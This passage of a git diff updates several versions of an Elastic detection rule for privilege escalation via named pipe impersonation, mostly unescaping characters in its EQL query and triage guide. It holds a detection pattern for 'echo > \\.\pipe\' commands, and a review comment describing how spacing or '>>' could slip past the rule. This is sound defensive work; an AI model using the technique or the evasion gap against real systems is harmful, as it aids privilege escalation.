during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
+ "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
 "references": [
 "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation",
 "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json
index cb86acd183e..85099d2fd68 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_105.json
@@ -14,8 +14,8 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Privilege Escalation via Named Pipe Impersonation",
- "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
- "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
+ "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
 "references": [
 "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation",
 "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json
index 7a5e3349186..ccb1d0348a0 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_106.json
@@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \">\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n",
 "references": [
 "https://www.ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation",
 "https://www.cobaltstrike.com/blog/what-happens-when-i-type-getsystem/",
@@ -55,7 +55,7 @@
 ],
 "risk_score": 73,
 "rule_id": "3ecbdc9e-e4f2-43fa-8cca-63802125e582",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
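Review bot: The redirect test `process.args : ">"` in the new-side query only fires when the `>` is tokenized as its own argument, so a command written without surrounding spaces (`echo x>\\.\pipe\foo`) or using an append redirect (`>>`) may slip past, depending on how the agent splits `process.args`. A more robust form would match the whole command line, e.g. (EQL, before JSON escaping) `process.command_line : "*echo*>*\\\\.\\pipe\\*"`, or at minimum `process.args : (">", ">>")`. The query itself is unchanged by this commit apart from the `\u003e` unescaping, so this is a pre-existing gap in the rule rather than a regression introduced here.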
diff --git a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json
index fc996cc21b3..e9336e78ad4 100644
--- a/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3ecbdc9e-e4f2-43fa-8cca-63802125e582_107.json
@@ -14,8 +14,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Privilege Escalation via Named Pipe Impersonation", - "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - If any suspicious processes were found, examine the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with 
Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name in (\"Cmd.Exe\", \"PowerShell.EXE\") and\n process.args : \"echo\" and process.args : \"\u003e\" and process.args : \"\\\\\\\\.\\\\pipe\\\\*\"\n", + "note": "## Triage and analysis\n\n### Investigating Privilege Escalation via Named Pipe Impersonation\n\nA named pipe is a type of inter-process communication (IPC) mechanism used in operating systems like Windows, which allows two or more processes to communicate with each other by sending and receiving data through a well-known point.\n\nAttackers can abuse named pipes to elevate their privileges by impersonating the security context in which they execute code. Metasploit, for example, creates a service and a random pipe, and then uses the service to connect to the pipe and impersonate the service security context, which is SYSTEM.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) 